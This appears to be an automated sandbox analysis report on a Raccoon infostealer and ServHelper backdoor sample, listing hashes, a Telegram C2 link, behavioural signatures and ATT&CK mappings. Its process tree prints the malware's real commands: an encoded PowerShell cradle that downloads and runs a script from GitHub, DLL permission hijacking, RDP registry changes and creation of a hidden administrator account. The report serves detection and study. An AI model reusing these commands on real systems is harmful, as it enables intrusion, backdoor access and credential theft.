Analysis

  • max time kernel
    122s
  • max time network
    157s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    03-06-2021 16:36

General

  • Target

    9d8c7ac5f187791b701c916c35911821.exe

  • Size

    567KB

  • MD5

    9d8c7ac5f187791b701c916c35911821

  • SHA1

    aeaad2abdb996190fe24e6af8a8eac355572dcf2

  • SHA256

    0d6e106e13ca046d0f19c9d0e9542f9142c5a9172b2cf9e2e764519f72514d9b

  • SHA512

    249c5c832029369d896aa430835c9892ab94e8b0fd0337b80b57116e316fe441dd49e8752ffbf20b0470f1b1ad47a8963bc4685e1b26d9b7c342476eb4e9e506

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Extracted

Family

raccoon

Botnet

89ac909b803bacbc6cc523520599c4b9c029b033

Attributes
  • url4cnc

    https://tttttt.me/jdiamond13

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Deletes itself 1 IoCs
  • Loads dropped DLL 12 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9d8c7ac5f187791b701c916c35911821.exe
    "C:\Users\Admin\AppData\Local\Temp\9d8c7ac5f187791b701c916c35911821.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2020
    • C:\Users\Admin\AppData\Local\Temp\UZpYJc1ETn.exe
      "C:\Users\Admin\AppData\Local\Temp\UZpYJc1ETn.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1780
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        3⤵
        • Drops file in System32 directory
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:552
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kzava2dl\kzava2dl.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES65A6.tmp" "c:\Users\Admin\AppData\Local\Temp\kzava2dl\CSC8726A1241BCD4EEBBB5239979B76C0F4.TMP"
            5⤵
              PID:2028
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1616
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1552
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1696
          • C:\Windows\system32\takeown.exe
            "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1724
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1768
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:852
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:556
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:984
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:1076
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:560
          • C:\Windows\system32\icacls.exe
            "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:864
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            4⤵
              PID:960
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              4⤵
              • Modifies registry key
              PID:1672
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              4⤵
                PID:1548
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1992
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                    5⤵
                      PID:428
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                    4⤵
                      PID:1840
                      • C:\Windows\system32\cmd.exe
                        cmd /c net start rdpdr
                        5⤵
                          PID:304
                          • C:\Windows\system32\net.exe
                            net start rdpdr
                            6⤵
                              PID:1588
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 start rdpdr
                                7⤵
                                  PID:1696
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                            4⤵
                              PID:1108
                              • C:\Windows\system32\cmd.exe
                                cmd /c net start TermService
                                5⤵
                                  PID:1680
                                  • C:\Windows\system32\net.exe
                                    net start TermService
                                    6⤵
                                      PID:1028
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 start TermService
                                        7⤵
                                          PID:636
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                                    4⤵
                                      PID:1360
                                    • C:\Windows\system32\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                                      4⤵
                                        PID:1548
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\9d8c7ac5f187791b701c916c35911821.exe"
                                    2⤵
                                    • Deletes itself
                                    • Suspicious use of WriteProcessMemory
                                    PID:276
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /T 10 /NOBREAK
                                      3⤵
                                      • Delays execution with timeout.exe
                                      PID:1508
                                • C:\Windows\System32\cmd.exe
                                  cmd /C net.exe user wgautilacc Ghar4f5 /del
                                  1⤵
                                    PID:1076
                                    • C:\Windows\system32\net.exe
                                      net.exe user wgautilacc Ghar4f5 /del
                                      2⤵
                                        PID:1316
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                          3⤵
                                            PID:268
                                      • C:\Windows\System32\cmd.exe
                                        cmd /C net.exe user wgautilacc JwE3eIhI /add
                                        1⤵
                                          PID:1360
                                          • C:\Windows\system32\net.exe
                                            net.exe user wgautilacc JwE3eIhI /add
                                            2⤵
                                              PID:1764
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 user wgautilacc JwE3eIhI /add
                                                3⤵
                                                  PID:1896
                                            • C:\Windows\System32\cmd.exe
                                              cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                              1⤵
                                                PID:1752
                                                • C:\Windows\system32\net.exe
                                                  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                  2⤵
                                                    PID:1864
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                                      3⤵
                                                        PID:1724
                                                  • C:\Windows\System32\cmd.exe
                                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                    1⤵
                                                      PID:1072
                                                      • C:\Windows\system32\net.exe
                                                        net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                        2⤵
                                                          PID:1316
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD
                                                            3⤵
                                                              PID:2020
                                                        • C:\Windows\System32\cmd.exe
                                                          cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                          1⤵
                                                            PID:1992
                                                            • C:\Windows\system32\net.exe
                                                              net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                              2⤵
                                                                PID:1764
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                                  3⤵
                                                                    PID:1360
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd /C net.exe user wgautilacc JwE3eIhI
                                                                1⤵
                                                                  PID:952
                                                                  • C:\Windows\system32\net.exe
                                                                    net.exe user wgautilacc JwE3eIhI
                                                                    2⤵
                                                                      PID:1864
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 user wgautilacc JwE3eIhI
                                                                        3⤵
                                                                          PID:1724
                                                                    • C:\Windows\System32\cmd.exe
                                                                      cmd.exe /C wmic path win32_VideoController get name
                                                                      1⤵
                                                                        PID:880
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic path win32_VideoController get name
                                                                          2⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:1072
                                                                      • C:\Windows\System32\cmd.exe
                                                                        cmd.exe /C wmic CPU get NAME
                                                                        1⤵
                                                                          PID:1552
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic CPU get NAME
                                                                            2⤵
                                                                            • Modifies data under HKEY_USERS
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1972
                                                                        • C:\Windows\System32\cmd.exe
                                                                          cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                          1⤵
                                                                            PID:1356
                                                                            • C:\Windows\system32\cmd.exe
                                                                              cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                              2⤵
                                                                                PID:1576
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                                  3⤵
                                                                                  • Blocklisted process makes network request
                                                                                  • Drops file in Windows directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:1588
                                                                            • C:\Windows\System32\cmd.exe
                                                                              cmd.exe /C net user wgautilacc 1234
                                                                              1⤵
                                                                                PID:428
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user wgautilacc 1234
                                                                                  2⤵
                                                                                    PID:1364
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user wgautilacc 1234
                                                                                      3⤵
                                                                                        PID:572

                                                                                  Network

                                                                                  MITRE ATT&CK Matrix ATT&CK v6

                                                                                  Persistence

                                                                                  Account Manipulation

                                                                                  1
                                                                                  T1098

                                                                                  Registry Run Keys / Startup Folder

                                                                                  1
                                                                                  T1060

                                                                                  Defense Evasion

                                                                                  Modify Registry

                                                                                  3
                                                                                  T1112

                                                                                  File Permissions Modification

                                                                                  1
                                                                                  T1222

                                                                                  Install Root Certificate

                                                                                  1
                                                                                  T1130

                                                                                  Credential Access

                                                                                  Credentials in Files

                                                                                  2
                                                                                  T1081

                                                                                  Discovery

                                                                                  Query Registry

                                                                                  1
                                                                                  T1012

                                                                                  System Information Discovery

                                                                                  1
                                                                                  T1082

                                                                                  Lateral Movement

                                                                                  Remote Desktop Protocol

                                                                                  1
                                                                                  T1076

                                                                                  Collection

                                                                                  Data from Local System

                                                                                  2
                                                                                  T1005

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_056d7d6c-b041-40da-9b7d-b6a3cc372d2f
                                                                                    MD5

                                                                                    faa37917b36371249ac9fcf93317bf97

                                                                                    SHA1

                                                                                    a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

                                                                                    SHA256

                                                                                    b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

                                                                                    SHA512

                                                                                    614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_49665617-c798-4ab9-909b-1c05d9f010d4
                                                                                    MD5

                                                                                    6f0d509e28be1af95ba237d4f43adab4

                                                                                    SHA1

                                                                                    c665febe79e435843553bee86a6cea731ce6c5e4

                                                                                    SHA256

                                                                                    f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

                                                                                    SHA512

                                                                                    8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_62a45f37-f154-466b-a277-4d9217048f29
                                                                                    MD5

                                                                                    a70ee38af4bb2b5ed3eeb7cbd1a12fa3

                                                                                    SHA1

                                                                                    81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

                                                                                    SHA256

                                                                                    dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

                                                                                    SHA512

                                                                                    8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c660dc20-e000-4de0-9560-82bdadbaa482
                                                                                    MD5

                                                                                    2d5cd190b5db0620cd62e3cd6ba1dcd3

                                                                                    SHA1

                                                                                    ff4f229f4fbacccdf11d98c04ba756bda80aac7a

                                                                                    SHA256

                                                                                    ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

                                                                                    SHA512

                                                                                    edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cf430533-d663-41a0-a109-61fbd5c05d1b
                                                                                    MD5

                                                                                    7f79b990cb5ed648f9e583fe35527aa7

                                                                                    SHA1

                                                                                    71b177b48c8bd745ef02c2affad79ca222da7c33

                                                                                    SHA256

                                                                                    080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

                                                                                    SHA512

                                                                                    20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eddbd9d7-5ecd-4cd2-a798-6980e7aa8b1c
                                                                                    MD5

                                                                                    d89968acfbd0cd60b51df04860d99896

                                                                                    SHA1

                                                                                    b3c29916ccb81ce98f95bbf3aa8a73de16298b29

                                                                                    SHA256

                                                                                    1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

                                                                                    SHA512

                                                                                    b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f70399cb-9f04-4e15-a2d6-690aa0eacba4
                                                                                    MD5

                                                                                    e5b3ba61c3cf07deda462c9b27eb4166

                                                                                    SHA1

                                                                                    b324dad73048be6e27467315f82b7a5c1438a1f9

                                                                                    SHA256

                                                                                    b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

                                                                                    SHA512

                                                                                    a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                                    MD5

                                                                                    6c7858e99fc18d87d71af00a89c7288c

                                                                                    SHA1

                                                                                    9bb396d08dc82a4b128e183e0b56541c3faba651

                                                                                    SHA256

                                                                                    6ada67e8cd0e0c6d4eb34b3fc0bc2544e26889a26e80333ce4a105216b5e5718

                                                                                    SHA512

                                                                                    45b78fb04790c449b58b9c8f66b2959f6874115781f7d8beec4a5397994bb2c636d0b8c0d98f9eb6aada84f9136648061f79d888120c7fe11a91095ab5adb4ef

                                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                                                                                    MD5

                                                                                    17523c6001896372dc11a4376b33b1d0

                                                                                    SHA1

                                                                                    6e2cf12b28a64b924c2a96c5b4759d773b73d463

                                                                                    SHA256

                                                                                    b26bf259af8d59d8bdf49898ec686b84bc61f1f4b825dcdb473d2f69c9b258e9

                                                                                    SHA512

                                                                                    d8c6cfbe39358da2c36108613e19bce28e6314ad072ea45f127075cff329bfb7d79d4bfa6a186045dfd1c75953f6ba8b7ed7b285963a404201ce1a2306a90b8d

                                                                                  • C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1
                                                                                    MD5

                                                                                    b2207567c6a62b42655772770ce2a4e6

                                                                                    SHA1

                                                                                    51074ad655105f0c496f4017e8afee90d9cab900

                                                                                    SHA256

                                                                                    d7b206f39b6f6996cb9472df9fa350ab9da7f1eca47f782c4e5d05ca338daaab

                                                                                    SHA512

                                                                                    85d8eb5772d672b1e84b3f09048c207ed7ecaa7f68f14dc34baa34dd49ed0d674ff150eec20932e468a7a4d17d91d22caa639fe8d9bab0bed0105c4c38631bb5

                                                                                  • C:\Users\Admin\AppData\Local\Temp\RES65A6.tmp
                                                                                    MD5

                                                                                    c6d068e05343fd8d124ad5f6b627c788

                                                                                    SHA1

                                                                                    61bcd4ae1282422f0c82bd1e57084c8040be11dd

                                                                                    SHA256

                                                                                    345fe5f3d6aabd1be12cef7b30969f4a46759b056935b396a25643faa796607f

                                                                                    SHA512

                                                                                    6d5b5bdb512b837a10a8c1779bdaa4ad1e79ff0da433b0102a78f5e1b7e4ce9dd7e23571be2713690119ec253b17aea4c8ace8710ee16b62e3f2df35de67cb21

                                                                                  • C:\Users\Admin\AppData\Local\Temp\UZpYJc1ETn.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • C:\Users\Admin\AppData\Local\Temp\UZpYJc1ETn.exe
                                                                                    MD5

                                                                                    aa80d5960e65ac46ad446c09c1a17608

                                                                                    SHA1

                                                                                    c2468b1792e5ecef461d2d89470e8438c05cce24

                                                                                    SHA256

                                                                                    857ddc8de567afa19f5bc9236f6cf3681e46919530f90acc25ff36112564432c

                                                                                    SHA512

                                                                                    07e15d76dc1940e0b3a926cfa6a5d92760525ae7f9e54bc8c691f1c9ea8af71ffe818aa347857a5c1435316d152a262a1875f03f465bc7be36a10e73bab6022b

                                                                                  • C:\Users\Admin\AppData\Local\Temp\kzava2dl\kzava2dl.dll
                                                                                    MD5

                                                                                    61be0f7b6ab2366bc5a099813f7ad26a

                                                                                    SHA1

                                                                                    15a862902c23896c38691d419e88387dc7c34a88

                                                                                    SHA256

                                                                                    b10dae4ef9185b61fa86c4b566b9e4fd1650e2906768f6cfdd5857ef72403f83

                                                                                    SHA512

                                                                                    c9175b22daa257e31e34772aee64004038e05a09d7deb589c454f1556cc01564f6dd853fa877cbc67d8bbb16c475053f9db6bcee719ce3e8612cb7b86ab49af5

                                                                                  • C:\Users\Admin\AppData\Local\Temp\ready.ps1
                                                                                    MD5

                                                                                    065cc96fec70546c9f195f703e4d657b

                                                                                    SHA1

                                                                                    9da24636d8fd3de61f46ff7282640d3fa27d6b45

                                                                                    SHA256

                                                                                    cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3

                                                                                    SHA512

                                                                                    a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                    MD5

                                                                                    fa91d2945b5f333454d8558caaec5d41

                                                                                    SHA1

                                                                                    8f4a3e5765489481529a57f1e15f2ebef370f4ac

                                                                                    SHA256

                                                                                    12b30829ba260f53c6eb84c4a52fa0b1c9b6444a8a2797defd9359d6fa012646

                                                                                    SHA512

                                                                                    96cc21547631eab5017420c7e51bf64b23210cae881eff84e312ae9a4f7539ae3c39123a1c2944bb5ef58ef3a97d8f6d637fac7527c28610f2f2a92f8a9bf01d

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                    MD5

                                                                                    fa91d2945b5f333454d8558caaec5d41

                                                                                    SHA1

                                                                                    8f4a3e5765489481529a57f1e15f2ebef370f4ac

                                                                                    SHA256

                                                                                    12b30829ba260f53c6eb84c4a52fa0b1c9b6444a8a2797defd9359d6fa012646

                                                                                    SHA512

                                                                                    96cc21547631eab5017420c7e51bf64b23210cae881eff84e312ae9a4f7539ae3c39123a1c2944bb5ef58ef3a97d8f6d637fac7527c28610f2f2a92f8a9bf01d

                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                    MD5

                                                                                    fa91d2945b5f333454d8558caaec5d41

                                                                                    SHA1

                                                                                    8f4a3e5765489481529a57f1e15f2ebef370f4ac

                                                                                    SHA256

                                                                                    12b30829ba260f53c6eb84c4a52fa0b1c9b6444a8a2797defd9359d6fa012646

                                                                                    SHA512

                                                                                    96cc21547631eab5017420c7e51bf64b23210cae881eff84e312ae9a4f7539ae3c39123a1c2944bb5ef58ef3a97d8f6d637fac7527c28610f2f2a92f8a9bf01d

                                                                                  • C:\Windows\system32\rfxvmt.dll
                                                                                    MD5

                                                                                    dc39d23e4c0e681fad7a3e1342a2843c

                                                                                    SHA1

                                                                                    58fd7d50c2dca464a128f5e0435d6f0515e62073

                                                                                    SHA256

                                                                                    6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

                                                                                    SHA512

                                                                                    5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

                                                                                  • \??\PIPE\srvsvc
                                                                                    MD5

                                                                                    d41d8cd98f00b204e9800998ecf8427e

                                                                                    SHA1

                                                                                    da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                    SHA256

                                                                                    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                    SHA512

                                                                                    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\kzava2dl\CSC8726A1241BCD4EEBBB5239979B76C0F4.TMP
                                                                                    MD5

                                                                                    45e66fe53a34df2c5dcb1ca7327bede2

                                                                                    SHA1

                                                                                    4b332b5afe0278bb87af708ef9287f8980dfa906

                                                                                    SHA256

                                                                                    5b3664c1ced1dd4fabe92a6762cca82fa7d52041a009d10ec7a14ab725371fe1

                                                                                    SHA512

                                                                                    28308886e9153a6755d63c52ada3d6d4a83401519c08bce4639539747f990de879fd5d76c79753dd97a14d2a820bfa4b52bc37b3cf27cee6844a7949d917be72

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\kzava2dl\kzava2dl.0.cs
                                                                                    MD5

